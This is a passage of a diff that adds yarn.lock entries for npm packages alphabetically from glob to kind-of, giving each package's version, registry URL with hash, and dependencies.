+    inflight "^1.0.4"
+    inherits "2"
+    minimatch "^3.0.2"
+    once "^1.3.0"
+    path-is-absolute "^1.0.0"
+
+glob@^7.0.5, glob@^7.1.2:
+  version "7.1.2"
+  resolved "https://registry.yarnpkg.com/glob/-/glob-7.1.2.tgz#c19c9df9a028702d678612384a6552404c636d15"
+  dependencies:
+    fs.realpath "^1.0.0"
+    inflight "^1.0.4"
+    inherits "2"
+    minimatch "^3.0.4"
+    once "^1.3.0"
+    path-is-absolute "^1.0.0"
+
+global-dirs@^0.1.0:
+  version "0.1.1"
+  resolved "https://registry.yarnpkg.com/global-dirs/-/global-dirs-0.1.1.tgz#b319c0dd4607f353f3be9cca4c72fc148c49f445"
+  dependencies:
+    ini "^1.3.4"
+
+global@^4.3.2:
+  version "4.3.2"
+  resolved "https://registry.yarnpkg.com/global/-/global-4.3.2.tgz#e76989268a6c74c38908b1305b10fc0e394e9d0f"
+  dependencies:
+    min-document "^2.19.0"
+    process "~0.5.1"
+
+globals@^11.1.0:
+  version "11.7.0"
+  resolved "https://registry.yarnpkg.com/globals/-/globals-11.7.0.tgz#a583faa43055b1aca771914bf68258e2fc125673"
+
+globby@^7.1.1:
+  version "7.1.1"
+  resolved "https://registry.yarnpkg.com/globby/-/globby-7.1.1.tgz#fb2ccff9401f8600945dfada97440cca972b8680"
+  dependencies:
+    array-union "^1.0.1"
+    dir-glob "^2.0.0"
+    glob "^7.1.2"
+    ignore "^3.3.5"
+    pify "^3.0.0"
+    slash "^1.0.0"
+
+globby@^8.0.1:
+  version "8.0.1"
+  resolved "https://registry.yarnpkg.com/globby/-/globby-8.0.1.tgz#b5ad48b8aa80b35b814fc1281ecc851f1d2b5b50"
+  dependencies:
+    array-union "^1.0.1"
+    dir-glob "^2.0.0"
+    fast-glob "^2.0.2"
+    glob "^7.1.2"
+    ignore "^3.3.5"
+    pify "^3.0.0"
+    slash "^1.0.0"
+
+good-listener@^1.2.2:
+  version "1.2.2"
+  resolved "https://registry.yarnpkg.com/good-listener/-/good-listener-1.2.2.tgz#d53b30cdf9313dffb7dc9a0d477096aa6d145c50"
+  dependencies:
+    delegate "^3.1.2"
+
+got@^6.7.1:
+  version "6.7.1"
+  resolved "https://registry.yarnpkg.com/got/-/got-6.7.1.tgz#240cd05785a9a18e561dc1b44b41c763ef1e8db0"
+  dependencies:
+    create-error-class "^3.0.0"
+    duplexer3 "^0.1.4"
+    get-stream "^3.0.0"
+    is-redirect "^1.0.0"
+    is-retry-allowed "^1.0.0"
+    is-stream "^1.0.0"
+    lowercase-keys "^1.0.0"
+    safe-buffer "^5.0.1"
+    timed-out "^4.0.0"
+    unzip-response "^2.0.1"
+    url-parse-lax "^1.0.0"
+
+graceful-fs@^4.1.11, graceful-fs@^4.1.2, graceful-fs@^4.1.6:
+  version "4.1.11"
+  resolved "https://registry.yarnpkg.com/graceful-fs/-/graceful-fs-4.1.11.tgz#0e8bdfe4d1ddb8854d64e04ea7c00e2a026e5658"
+
+gray-matter@^4.0.1:
+  version "4.0.1"
+  resolved "https://registry.yarnpkg.com/gray-matter/-/gray-matter-4.0.1.tgz#375263c194f0d9755578c277e41b1c1dfdf22c7d"
+  dependencies:
+    js-yaml "^3.11.0"
+    kind-of "^6.0.2"
+    section-matter "^1.0.0"
+    strip-bom-string "^1.0.0"
+
+has-ansi@^2.0.0:
+  version "2.0.0"
+  resolved "https://registry.yarnpkg.com/has-ansi/-/has-ansi-2.0.0.tgz#34f5049ce1ecdf2b0649af3ef24e45ed35416d91"
+  dependencies:
+    ansi-regex "^2.0.0"
+
+has-flag@^1.0.0:
+  version "1.0.0"
+  resolved "https://registry.yarnpkg.com/has-flag/-/has-flag-1.0.0.tgz#9d9e793165ce017a00f00418c43f942a7b1d11fa"
+
+has-flag@^3.0.0:
+  version "3.0.0"
+  resolved "https://registry.yarnpkg.com/has-flag/-/has-flag-3.0.0.tgz#b5d454dc2199ae225699f3467e5a07f3b955bafd"
+
+has-symbols@^1.0.0:
+  version "1.0.0"
+  resolved "https://registry.yarnpkg.com/has-symbols/-/has-symbols-1.0.0.tgz#ba1a8f1af2a0fc39650f5c850367704122063b44"
+
+has-unicode@^2.0.0:
+  version "2.0.1"
+  resolved "https://registry.yarnpkg.com/has-unicode/-/has-unicode-2.0.1.tgz#e0e6fe6a28cf51138855e086d1691e771de2a8b9"
+
+has-value@^0.3.1:
+  version "0.3.1"
+  resolved "https://registry.yarnpkg.com/has-value/-/has-value-0.3.1.tgz#7b1f58bada62ca827ec0a2078025654845995e1f"
+  dependencies:
+    get-value "^2.0.3"
+    has-values "^0.1.4"
+    isobject "^2.0.0"
+
+has-value@^1.0.0:
+  version "1.0.0"
+  resolved "https://registry.yarnpkg.com/has-value/-/has-value-1.0.0.tgz#18b281da585b1c5c51def24c930ed29a0be6b177"
+  dependencies:
+    get-value "^2.0.6"
+    has-values "^1.0.0"
+    isobject "^3.0.0"
+
+has-values@^0.1.4:
+  version "0.1.4"
+  resolved "https://registry.yarnpkg.com/has-values/-/has-values-0.1.4.tgz#6d61de95d91dfca9b9a02089ad384bff8f62b771"
+
+has-values@^1.0.0:
+  version "1.0.0"
+  resolved "https://registry.yarnpkg.com/has-values/-/has-values-1.0.0.tgz#95b0b63fec2146619a6fe57fe75628d5a39efe4f"
+  dependencies:
+    is-number "^3.0.0"
+    kind-of "^4.0.0"
+
+has@^1.0.1:
+  version "1.0.3"
+  resolved "https://registry.yarnpkg.com/has/-/has-1.0.3.tgz#722d7cbfc1f6aa8241f16dd814e011e1f41e8796"
+  dependencies:
+    function-bind "^1.1.1"
+
+hash-base@^3.0.0:
+  version "3.0.4"
+  resolved "https://registry.yarnpkg.com/hash-base/-/hash-base-3.0.4.tgz#5fc8686847ecd73499403319a6b0a3f3f6ae4918"
+  dependencies:
+    inherits "^2.0.1"
+    safe-buffer "^5.0.1"
+
+hash-sum@^1.0.2:
+  version "1.0.2"
+  resolved "https://registry.yarnpkg.com/hash-sum/-/hash-sum-1.0.2.tgz#33b40777754c6432573c120cc3808bbd10d47f04"
+
+hash.js@^1.0.0, hash.js@^1.0.3:
+  version "1.1.4"
+  resolved "https://registry.yarnpkg.com/hash.js/-/hash.js-1.1.4.tgz#8b50e1f35d51bd01e5ed9ece4dbe3549ccfa0a3c"
+  dependencies:
+    inherits "^2.0.3"
+    minimalistic-assert "^1.0.0"
+
+he@1.1.x, he@^1.1.0:
+  version "1.1.1"
+  resolved "https://registry.yarnpkg.com/he/-/he-1.1.1.tgz#93410fd21b009735151f8868c2f271f3427e23fd"
+
+hmac-drbg@^1.0.0:
+  version "1.0.1"
+  resolved "https://registry.yarnpkg.com/hmac-drbg/-/hmac-drbg-1.0.1.tgz#d2745701025a6c775a6c545793ed502fc0c649a1"
+  dependencies:
+    hash.js "^1.0.3"
+    minimalistic-assert "^1.0.0"
+    minimalistic-crypto-utils "^1.0.1"
+
+hoek@4.x.x:
+  version "4.2.1"
+  resolved "https://registry.yarnpkg.com/hoek/-/hoek-4.2.1.tgz#9634502aa12c445dd5a7c5734b572bb8738aacbb"
+
+hogan.js@^3.0.2:
+  version "3.0.2"
+  resolved "https://registry.yarnpkg.com/hogan.js/-/hogan.js-3.0.2.tgz#4cd9e1abd4294146e7679e41d7898732b02c7bfd"
+  dependencies:
+    mkdirp "0.3.0"
+    nopt "1.0.10"
+
+hosted-git-info@^2.1.4:
+  version "2.6.0"
+  resolved "https://registry.yarnpkg.com/hosted-git-info/-/hosted-git-info-2.6.0.tgz#23235b29ab230c576aab0d4f13fc046b0b038222"
+
+html-comment-regex@^1.1.0:
+  version "1.1.1"
+  resolved "https://registry.yarnpkg.com/html-comment-regex/-/html-comment-regex-1.1.1.tgz#668b93776eaae55ebde8f3ad464b307a4963625e"
+
+html-minifier@^3.2.3:
+  version "3.5.16"
+  resolved "https://registry.yarnpkg.com/html-minifier/-/html-minifier-3.5.16.tgz#39f5aabaf78bdfc057fe67334226efd7f3851175"
+  dependencies:
+    camel-case "3.0.x"
+    clean-css "4.1.x"
+    commander "2.15.x"
+    he "1.1.x"
+    param-case "2.1.x"
+    relateurl "0.2.x"
+    uglify-js "3.3.x"
+
+htmlparser2@~3.3.0:
+  version "3.3.0"
+  resolved "https://registry.yarnpkg.com/htmlparser2/-/htmlparser2-3.3.0.tgz#cc70d05a59f6542e43f0e685c982e14c924a9efe"
+  dependencies:
+    domelementtype "1"
+    domhandler "2.1"
+    domutils "1.1"
+    readable-stream "1.0"
+
+http-assert@^1.1.0:
+  version "1.3.0"
+  resolved "https://registry.yarnpkg.com/http-assert/-/http-assert-1.3.0.tgz#a31a5cf88c873ecbb5796907d4d6f132e8c01e4a"
+  dependencies:
+    deep-equal "~1.0.1"
+    http-errors "~1.6.1"
+
+http-errors@^1.2.8, http-errors@^1.6.1, http-errors@~1.6.1, http-errors@~1.6.2:
+  version "1.6.3"
+  resolved "https://registry.yarnpkg.com/http-errors/-/http-errors-1.6.3.tgz#8b55680bb4be283a0b5bf4ea2e38580be1d9320d"
+  dependencies:
+    depd "~1.1.2"
+    inherits "2.0.3"
+    setprototypeof "1.1.0"
+    statuses ">= 1.4.0 < 2"
+
+https-browserify@^1.0.0:
+  version "1.0.0"
+  resolved "https://registry.yarnpkg.com/https-browserify/-/https-browserify-1.0.0.tgz#ec06c10e0a34c0f2faf199f7fd7fc78fffd03c73"
+
+iconv-lite@^0.4.4:
+  version "0.4.23"
+  resolved "https://registry.yarnpkg.com/iconv-lite/-/iconv-lite-0.4.23.tgz#297871f63be507adcfbfca715d0cd0eed84e9a63"
+  dependencies:
+    safer-buffer ">= 2.1.2 < 3"
+
+icss-replace-symbols@^1.1.0:
+  version "1.1.0"
+  resolved "https://registry.yarnpkg.com/icss-replace-symbols/-/icss-replace-symbols-1.1.0.tgz#06ea6f83679a7749e386cfe1fe812ae5db223ded"
+
+icss-utils@^2.1.0:
+  version "2.1.0"
+  resolved "https://registry.yarnpkg.com/icss-utils/-/icss-utils-2.1.0.tgz#83f0a0ec378bf3246178b6c2ad9136f135b1c962"
+  dependencies:
+    postcss "^6.0.1"
+
+ieee754@^1.1.11, ieee754@^1.1.4:
+  version "1.1.12"
+  resolved "https://registry.yarnpkg.com/ieee754/-/ieee754-1.1.12.tgz#50bf24e5b9c8bb98af4964c941cdb0918da7b60b"
+
+iferr@^0.1.5:
+  version "0.1.5"
+  resolved "https://registry.yarnpkg.com/iferr/-/iferr-0.1.5.tgz#c60eed69e6d8fdb6b3104a1fcbca1c192dc5b501"
+
+ignore-walk@^3.0.1:
+  version "3.0.1"
+  resolved "https://registry.yarnpkg.com/ignore-walk/-/ignore-walk-3.0.1.tgz#a83e62e7d272ac0e3b551aaa82831a19b69f82f8"
+  dependencies:
+    minimatch "^3.0.4"
+
+ignore@^3.3.5:
+  version "3.3.10"
+  resolved "https://registry.yarnpkg.com/ignore/-/ignore-3.3.10.tgz#0a97fb876986e8081c631160f8f9f389157f0043"
+
+immediate@^3.2.3:
+  version "3.2.3"
+  resolved "https://registry.yarnpkg.com/immediate/-/immediate-3.2.3.tgz#d140fa8f614659bd6541233097ddaac25cdd991c"
+
+import-lazy@^2.1.0:
+  version "2.1.0"
+  resolved "https://registry.yarnpkg.com/import-lazy/-/import-lazy-2.1.0.tgz#05698e3d45c88e8d7e9d92cb0584e77f096f3e43"
+
+import-local@^1.0.0:
+  version "1.0.0"
+  resolved "https://registry.yarnpkg.com/import-local/-/import-local-1.0.0.tgz#5e4ffdc03f4fe6c009c6729beb29631c2f8227bc"
+  dependencies:
+    pkg-dir "^2.0.0"
+    resolve-cwd "^2.0.0"
+
+imurmurhash@^0.1.4:
+  version "0.1.4"
+  resolved "https://registry.yarnpkg.com/imurmurhash/-/imurmurhash-0.1.4.tgz#9218b9b2b928a238b13dc4fb6b6d576f231453ea"
+
+indent-string@^3.0.0:
+  version "3.2.0"
+  resolved "https://registry.yarnpkg.com/indent-string/-/indent-string-3.2.0.tgz#4a5fd6d27cc332f37e5419a504dbb837105c9289"
+
+indexes-of@^1.0.1:
+  version "1.0.1"
+  resolved "https://registry.yarnpkg.com/indexes-of/-/indexes-of-1.0.1.tgz#f30f716c8e2bd346c7b67d3df3915566a7c05607"
+
+indexof@0.0.1:
+  version "0.0.1"
+  resolved "https://registry.yarnpkg.com/indexof/-/indexof-0.0.1.tgz#82dc336d232b9062179d05ab3293a66059fd435d"
+
+inflight@^1.0.4:
+  version "1.0.6"
+  resolved "https://registry.yarnpkg.com/inflight/-/inflight-1.0.6.tgz#49bd6331d7d02d0c09bc910a1075ba8165b56df9"
+  dependencies:
+    once "^1.3.0"
+    wrappy "1"
+
+inherits@2, inherits@2.0.3, inherits@^2.0.1, inherits@^2.0.3, inherits@~2.0.1, inherits@~2.0.3:
+  version "2.0.3"
+  resolved "https://registry.yarnpkg.com/inherits/-/inherits-2.0.3.tgz#633c2c83e3da42a502f52466022480f4208261de"
+
+inherits@2.0.1:
+  version "2.0.1"
+  resolved "https://registry.yarnpkg.com/inherits/-/inherits-2.0.1.tgz#b17d08d326b4423e568eff719f91b0b1cbdf69f1"
+
+ini@^1.3.4, ini@~1.3.0:
+  version "1.3.5"
+  resolved "https://registry.yarnpkg.com/ini/-/ini-1.3.5.tgz#eee25f56db1c9ec6085e0c22778083f596abf927"
+
+invariant@^2.2.0, invariant@^2.2.2:
+  version "2.2.4"
+  resolved "https://registry.yarnpkg.com/invariant/-/invariant-2.2.4.tgz#610f3c92c9359ce1db616e538008d23ff35158e6"
+  dependencies:
+    loose-envify "^1.0.0"
+
+is-absolute-url@^2.0.0:
+  version "2.1.0"
+  resolved "https://registry.yarnpkg.com/is-absolute-url/-/is-absolute-url-2.1.0.tgz#50530dfb84fcc9aa7dbe7852e83a37b93b9f2aa6"
+
+is-accessor-descriptor@^0.1.6:
+  version "0.1.6"
+  resolved "https://registry.yarnpkg.com/is-accessor-descriptor/-/is-accessor-descriptor-0.1.6.tgz#a9e12cb3ae8d876727eeef3843f8a0897b5c98d6"
+  dependencies:
+    kind-of "^3.0.2"
+
+is-accessor-descriptor@^1.0.0:
+  version "1.0.0"
+  resolved "https://registry.yarnpkg.com/is-accessor-descriptor/-/is-accessor-descriptor-1.0.0.tgz#169c2f6d3df1f992618072365c9b0ea1f6878656"
+  dependencies:
+    kind-of "^6.0.0"
+
+is-arrayish@^0.2.1:
+  version "0.2.1"
+  resolved "https://registry.yarnpkg.com/is-arrayish/-/is-arrayish-0.2.1.tgz#77c99840527aa8ecb1a8ba697b80645a7a926a9d"
+
+is-binary-path@^1.0.0:
+  version "1.0.1"
+  resolved "https://registry.yarnpkg.com/is-binary-path/-/is-binary-path-1.0.1.tgz#75f16642b480f187a711c814161fd3a4a7655898"
+  dependencies:
+    binary-extensions "^1.0.0"
+
+is-buffer@^1.1.5:
+  version "1.1.6"
+  resolved "https://registry.yarnpkg.com/is-buffer/-/is-buffer-1.1.6.tgz#efaa2ea9daa0d7ab2ea13a97b2b8ad51fefbe8be"
+
+is-builtin-module@^1.0.0:
+  version "1.0.0"
+  resolved "https://registry.yarnpkg.com/is-builtin-module/-/is-builtin-module-1.0.0.tgz#540572d34f7ac3119f8f76c30cbc1b1e037affbe"
+  dependencies:
+    builtin-modules "^1.0.0"
+
+is-callable@^1.1.1, is-callable@^1.1.3:
+  version "1.1.3"
+  resolved "https://registry.yarnpkg.com/is-callable/-/is-callable-1.1.3.tgz#86eb75392805ddc33af71c92a0eedf74ee7604b2"
+
+is-ci@^1.0.10, is-ci@^1.1.0:
+  version "1.1.0"
+  resolved "https://registry.yarnpkg.com/is-ci/-/is-ci-1.1.0.tgz#247e4162e7860cebbdaf30b774d6b0ac7dcfe7a5"
+  dependencies:
+    ci-info "^1.0.0"
+
+is-data-descriptor@^0.1.4:
+  version "0.1.4"
+  resolved "https://registry.yarnpkg.com/is-data-descriptor/-/is-data-descriptor-0.1.4.tgz#0b5ee648388e2c860282e793f1856fec3f301b56"
+  dependencies:
+    kind-of "^3.0.2"
+
+is-data-descriptor@^1.0.0:
+  version "1.0.0"
+  resolved "https://registry.yarnpkg.com/is-data-descriptor/-/is-data-descriptor-1.0.0.tgz#d84876321d0e7add03990406abbbbd36ba9268c7"
+  dependencies:
+    kind-of "^6.0.0"
+
+is-date-object@^1.0.1:
+  version "1.0.1"
+  resolved "https://registry.yarnpkg.com/is-date-object/-/is-date-object-1.0.1.tgz#9aa20eb6aeebbff77fbd33e74ca01b33581d3a16"
+
+is-descriptor@^0.1.0:
+  version "0.1.6"
+  resolved "https://registry.yarnpkg.com/is-descriptor/-/is-descriptor-0.1.6.tgz#366d8240dde487ca51823b1ab9f07a10a78251ca"
+  dependencies:
+    is-accessor-descriptor "^0.1.6"
+    is-data-descriptor "^0.1.4"
+    kind-of "^5.0.0"
+
+is-descriptor@^1.0.0, is-descriptor@^1.0.2:
+  version "1.0.2"
+  resolved "https://registry.yarnpkg.com/is-descriptor/-/is-descriptor-1.0.2.tgz#3b159746a66604b04f8c81524ba365c5f14d86ec"
+  dependencies:
+    is-accessor-descriptor "^1.0.0"
+    is-data-descriptor "^1.0.0"
+    kind-of "^6.0.2"
+
+is-directory@^0.3.1:
+  version "0.3.1"
+  resolved "https://registry.yarnpkg.com/is-directory/-/is-directory-0.3.1.tgz#61339b6f2475fc772fd9c9d83f5c8575dc154ae1"
+
+is-dotfile@^1.0.0:
+  version "1.0.3"
+  resolved "https://registry.yarnpkg.com/is-dotfile/-/is-dotfile-1.0.3.tgz#a6a2f32ffd2dfb04f5ca25ecd0f6b83cf798a1e1"
+
+is-equal-shallow@^0.1.3:
+  version "0.1.3"
+  resolved "https://registry.yarnpkg.com/is-equal-shallow/-/is-equal-shallow-0.1.3.tgz#2238098fc221de0bcfa5d9eac4c45d638aa1c534"
+  dependencies:
+    is-primitive "^2.0.0"
+
+is-extendable@^0.1.0, is-extendable@^0.1.1:
+  version "0.1.1"
+  resolved "https://registry.yarnpkg.com/is-extendable/-/is-extendable-0.1.1.tgz#62b110e289a471418e3ec36a617d472e301dfc89"
+
+is-extendable@^1.0.1:
+  version "1.0.1"
+  resolved "https://registry.yarnpkg.com/is-extendable/-/is-extendable-1.0.1.tgz#a7470f9e426733d81bd81e1155264e3a3507cab4"
+  dependencies:
+    is-plain-object "^2.0.4"
+
+is-extglob@^1.0.0:
+  version "1.0.0"
+  resolved "https://registry.yarnpkg.com/is-extglob/-/is-extglob-1.0.0.tgz#ac468177c4943405a092fc8f29760c6ffc6206c0"
+
+is-extglob@^2.1.0, is-extglob@^2.1.1:
+  version "2.1.1"
+  resolved "https://registry.yarnpkg.com/is-extglob/-/is-extglob-2.1.1.tgz#a88c02535791f02ed37c76a1b9ea9773c833f8c2"
+
+is-fullwidth-code-point@^1.0.0:
+  version "1.0.0"
+  resolved "https://registry.yarnpkg.com/is-fullwidth-code-point/-/is-fullwidth-code-point-1.0.0.tgz#ef9e31386f031a7f0d643af82fde50c457ef00cb"
+  dependencies:
+    number-is-nan "^1.0.0"
+
+is-fullwidth-code-point@^2.0.0:
+  version "2.0.0"
+  resolved "https://registry.yarnpkg.com/is-fullwidth-code-point/-/is-fullwidth-code-point-2.0.0.tgz#a3b30a5c4f199183167aaab93beefae3ddfb654f"
+
+is-generator-function@^1.0.3:
+  version "1.0.7"
+  resolved "https://registry.yarnpkg.com/is-generator-function/-/is-generator-function-1.0.7.tgz#d2132e529bb0000a7f80794d4bdf5cd5e5813522"
+
+is-glob@^2.0.0, is-glob@^2.0.1:
+  version "2.0.1"
+  resolved "https://registry.yarnpkg.com/is-glob/-/is-glob-2.0.1.tgz#d096f926a3ded5600f3fdfd91198cb0888c2d863"
+  dependencies:
+    is-extglob "^1.0.0"
+
+is-glob@^3.1.0:
+  version "3.1.0"
+  resolved "https://registry.yarnpkg.com/is-glob/-/is-glob-3.1.0.tgz#7ba5ae24217804ac70707b96922567486cc3e84a"
+  dependencies:
+    is-extglob "^2.1.0"
+
+is-glob@^4.0.0:
+  version "4.0.0"
+  resolved "https://registry.yarnpkg.com/is-glob/-/is-glob-4.0.0.tgz#9521c76845cc2610a85203ddf080a958c2ffabc0"
+  dependencies:
+    is-extglob "^2.1.1"
+
+is-installed-globally@^0.1.0:
+  version "0.1.0"
+  resolved "https://registry.yarnpkg.com/is-installed-globally/-/is-installed-globally-0.1.0.tgz#0dfd98f5a9111716dd535dda6492f67bf3d25a80"
+  dependencies:
+    global-dirs "^0.1.0"
+    is-path-inside "^1.0.0"
+
+is-npm@^1.0.0:
+  version "1.0.0"
+  resolved "https://registry.yarnpkg.com/is-npm/-/is-npm-1.0.0.tgz#f2fb63a65e4905b406c86072765a1a4dc793b9f4"
+
+is-number@^2.1.0:
+  version "2.1.0"
+  resolved "https://registry.yarnpkg.com/is-number/-/is-number-2.1.0.tgz#01fcbbb393463a548f2f466cce16dece49db908f"
+  dependencies:
+    kind-of "^3.0.2"
+
+is-number@^3.0.0:
+  version "3.0.0"
+  resolved "https://registry.yarnpkg.com/is-number/-/is-number-3.0.0.tgz#24fd6201a4782cf50561c810276afc7d12d71195"
+  dependencies:
+    kind-of "^3.0.2"
+
+is-number@^4.0.0:
+  version "4.0.0"
+  resolved "https://registry.yarnpkg.com/is-number/-/is-number-4.0.0.tgz#0026e37f5454d73e356dfe6564699867c6a7f0ff"
+
+is-number@^5.0.0:
+  version "5.0.0"
+  resolved "https://registry.yarnpkg.com/is-number/-/is-number-5.0.0.tgz#c393bc471e65de1a10a6abcb20efeb12d2b88166"
+
+is-obj@^1.0.0:
+  version "1.0.1"
+  resolved "https://registry.yarnpkg.com/is-obj/-/is-obj-1.0.1.tgz#3e4729ac1f5fde025cd7d83a896dab9f4f67db0f"
+
+is-odd@^2.0.0:
+  version "2.0.0"
+  resolved "https://registry.yarnpkg.com/is-odd/-/is-odd-2.0.0.tgz#7646624671fd7ea558ccd9a2795182f2958f1b24"
+  dependencies:
+    is-number "^4.0.0"
+
+is-path-inside@^1.0.0:
+  version "1.0.1"
+  resolved "https://registry.yarnpkg.com/is-path-inside/-/is-path-inside-1.0.1.tgz#8ef5b7de50437a3fdca6b4e865ef7aa55cb48036"
+  dependencies:
+    path-is-inside "^1.0.1"
+
+is-plain-obj@^1.0.0, is-plain-obj@^1.1, is-plain-obj@^1.1.0:
+  version "1.1.0"
+  resolved "https://registry.yarnpkg.com/is-plain-obj/-/is-plain-obj-1.1.0.tgz#71a50c8429dfca773c92a390a4a03b39fcd51d3e"
+
+is-plain-object@^2.0.1, is-plain-object@^2.0.3, is-plain-object@^2.0.4:
+  version "2.0.4"
+  resolved "https://registry.yarnpkg.com/is-plain-object/-/is-plain-object-2.0.4.tgz#2c163b3fafb1b606d9d17928f05c2a1c38e07677"
+  dependencies:
+    isobject "^3.0.1"
+
+is-posix-bracket@^0.1.0:
+  version "0.1.1"
+  resolved "https://registry.yarnpkg.com/is-posix-bracket/-/is-posix-bracket-0.1.1.tgz#3334dc79774368e92f016e6fbc0a88f5cd6e6bc4"
+
+is-primitive@^2.0.0:
+  version "2.0.0"
+  resolved "https://registry.yarnpkg.com/is-primitive/-/is-primitive-2.0.0.tgz#207bab91638499c07b2adf240a41a87210034575"
+
+is-redirect@^1.0.0:
+  version "1.0.0"
+  resolved "https://registry.yarnpkg.com/is-redirect/-/is-redirect-1.0.0.tgz#1d03dded53bd8db0f30c26e4f95d36fc7c87dc24"
+
+is-regex@^1.0.4:
+  version "1.0.4"
+  resolved "https://registry.yarnpkg.com/is-regex/-/is-regex-1.0.4.tgz#5517489b547091b0930e095654ced25ee97e9491"
+  dependencies:
+    has "^1.0.1"
+
+is-retry-allowed@^1.0.0:
+  version "1.1.0"
+  resolved "https://registry.yarnpkg.com/is-retry-allowed/-/is-retry-allowed-1.1.0.tgz#11a060568b67339444033d0125a61a20d564fb34"
+
+is-stream@^1.0.0, is-stream@^1.1.0:
+  version "1.1.0"
+  resolved "https://registry.yarnpkg.com/is-stream/-/is-stream-1.1.0.tgz#12d4a3dd4e68e0b79ceb8dbc84173ae80d91ca44"
+
+is-svg@^2.0.0:
+  version "2.1.0"
+  resolved "https://registry.yarnpkg.com/is-svg/-/is-svg-2.1.0.tgz#cf61090da0d9efbcab8722deba6f032208dbb0e9"
+  dependencies:
+    html-comment-regex "^1.1.0"
+
+is-symbol@^1.0.1:
+  version "1.0.1"
+  resolved "https://registry.yarnpkg.com/is-symbol/-/is-symbol-1.0.1.tgz#3cc59f00025194b6ab2e38dbae6689256b660572"
+
+is-windows@^1.0.2:
+  version "1.0.2"
+  resolved "https://registry.yarnpkg.com/is-windows/-/is-windows-1.0.2.tgz#d1850eb9791ecd18e6182ce12a30f396634bb19d"
+
+is-wsl@^1.1.0:
+  version "1.1.0"
+  resolved "https://registry.yarnpkg.com/is-wsl/-/is-wsl-1.1.0.tgz#1f16e4aa22b04d1336b66188a66af3c600c3a66d"
+
+isarray@0.0.1:
+  version "0.0.1"
+  resolved "https://registry.yarnpkg.com/isarray/-/isarray-0.0.1.tgz#8a18acfca9a8f4177e09abfc6038939b05d1eedf"
+
+isarray@1.0.0, isarray@^1.0.0, isarray@~1.0.0:
+  version "1.0.0"
+  resolved "https://registry.yarnpkg.com/isarray/-/isarray-1.0.0.tgz#bb935d48582cba168c06834957a54a3e07124f11"
+
+isarray@^2.0.1:
+  version "2.0.4"
+  resolved "https://registry.yarnpkg.com/isarray/-/isarray-2.0.4.tgz#38e7bcbb0f3ba1b7933c86ba1894ddfc3781bbb7"
+
+isemail@3.x.x:
+  version "3.1.2"
+  resolved "https://registry.yarnpkg.com/isemail/-/isemail-3.1.2.tgz#937cf919002077999a73ea8b1951d590e84e01dd"
+  dependencies:
+    punycode "2.x.x"
+
+isexe@^2.0.0:
+  version "2.0.0"
+  resolved "https://registry.yarnpkg.com/isexe/-/isexe-2.0.0.tgz#e8fbf374dc556ff8947a10dcb0572d633f2cfa10"
+
+isobject@^2.0.0:
+  version "2.1.0"
+  resolved "https://registry.yarnpkg.com/isobject/-/isobject-2.1.0.tgz#f065561096a3f1da2ef46272f815c840d87e0c89"
+  dependencies:
+    isarray "1.0.0"
+
+isobject@^3.0.0, isobject@^3.0.1:
+  version "3.0.1"
+  resolved "https://registry.yarnpkg.com/isobject/-/isobject-3.0.1.tgz#4e431e92b11a9731636aa1f9c8d1ccbcfdab78df"
+
+javascript-stringify@^1.6.0:
+  version "1.6.0"
+  resolved "https://registry.yarnpkg.com/javascript-stringify/-/javascript-stringify-1.6.0.tgz#142d111f3a6e3dae8f4a9afd77d45855b5a9cce3"
+
+joi@^11.1.1:
+  version "11.4.0"
+  resolved "https://registry.yarnpkg.com/joi/-/joi-11.4.0.tgz#f674897537b625e9ac3d0b7e1604c828ad913ccb"
+  dependencies:
+    hoek "4.x.x"
+    isemail "3.x.x"
+    topo "2.x.x"
+
+js-base64@^2.1.9:
+  version "2.4.5"
+  resolved "https://registry.yarnpkg.com/js-base64/-/js-base64-2.4.5.tgz#e293cd3c7c82f070d700fc7a1ca0a2e69f101f92"
+
+js-tokens@^3.0.0, js-tokens@^3.0.2:
+  version "3.0.2"
+  resolved "https://registry.yarnpkg.com/js-tokens/-/js-tokens-3.0.2.tgz#9866df395102130e38f7f996bceb65443209c25b"
+
+js-yaml@^3.11.0, js-yaml@^3.4.3, js-yaml@^3.9.0:
+  version "3.12.0"
+  resolved "https://registry.yarnpkg.com/js-yaml/-/js-yaml-3.12.0.tgz#eaed656ec8344f10f527c6bfa1b6e2244de167d1"
+  dependencies:
+    argparse "^1.0.7"
+    esprima "^4.0.0"
+
+js-yaml@~3.7.0:
+  version "3.7.0"
+  resolved "https://registry.yarnpkg.com/js-yaml/-/js-yaml-3.7.0.tgz#5c967ddd837a9bfdca5f2de84253abe8a1c03b80"
+  dependencies:
+    argparse "^1.0.7"
+    esprima "^2.6.0"
+
+jsesc@^2.5.1:
+  version "2.5.1"
+  resolved "https://registry.yarnpkg.com/jsesc/-/jsesc-2.5.1.tgz#e421a2a8e20d6b0819df28908f782526b96dd1fe"
+
+jsesc@~0.5.0:
+  version "0.5.0"
+  resolved "https://registry.yarnpkg.com/jsesc/-/jsesc-0.5.0.tgz#e7dee66e35d6fc16f710fe91d5cf69f70f08911d"
+
+json-parse-better-errors@^1.0.1, json-parse-better-errors@^1.0.2:
+  version "1.0.2"
+  resolved "https://registry.yarnpkg.com/json-parse-better-errors/-/json-parse-better-errors-1.0.2.tgz#bb867cfb3450e69107c131d1c514bab3dc8bcaa9"
+
+json-schema-traverse@^0.4.1:
+  version "0.4.1"
+  resolved "https://registry.yarnpkg.com/json-schema-traverse/-/json-schema-traverse-0.4.1.tgz#69f6a87d9513ab8bb8fe63bdb0979c448e684660"
+
+json-stringify-safe@^5.0.1:
+  version "5.0.1"
+  resolved "https://registry.yarnpkg.com/json-stringify-safe/-/json-stringify-safe-5.0.1.tgz#1296a2d58fd45f19a0f6ce01d65701e2c735b6eb"
+
+json5@^0.5.0:
+  version "0.5.1"
+  resolved "https://registry.yarnpkg.com/json5/-/json5-0.5.1.tgz#1eade7acc012034ad84e2396767ead9fa5495821"
+
+jsonfile@^4.0.0:
+  version "4.0.0"
+  resolved "https://registry.yarnpkg.com/jsonfile/-/jsonfile-4.0.0.tgz#8771aae0799b64076b76640fca058f9c10e33ecb"
+  optionalDependencies:
+    graceful-fs "^4.1.6"
+
+keygrip@~1.0.2:
+  version "1.0.2"
+  resolved "https://registry.yarnpkg.com/keygrip/-/keygrip-1.0.2.tgz#ad3297c557069dea8bcfe7a4fa491b75c5ddeb91"
+
+killable@^1.0.0:
+  version "1.0.0"
+  resolved "https://registry.yarnpkg.com/killable/-/killable-1.0.0.tgz#da8b84bd47de5395878f95d64d02f2449fe05e6b"
+
+kind-of@^3.0.2, kind-of@^3.0.3, kind-of@^3.2.0:
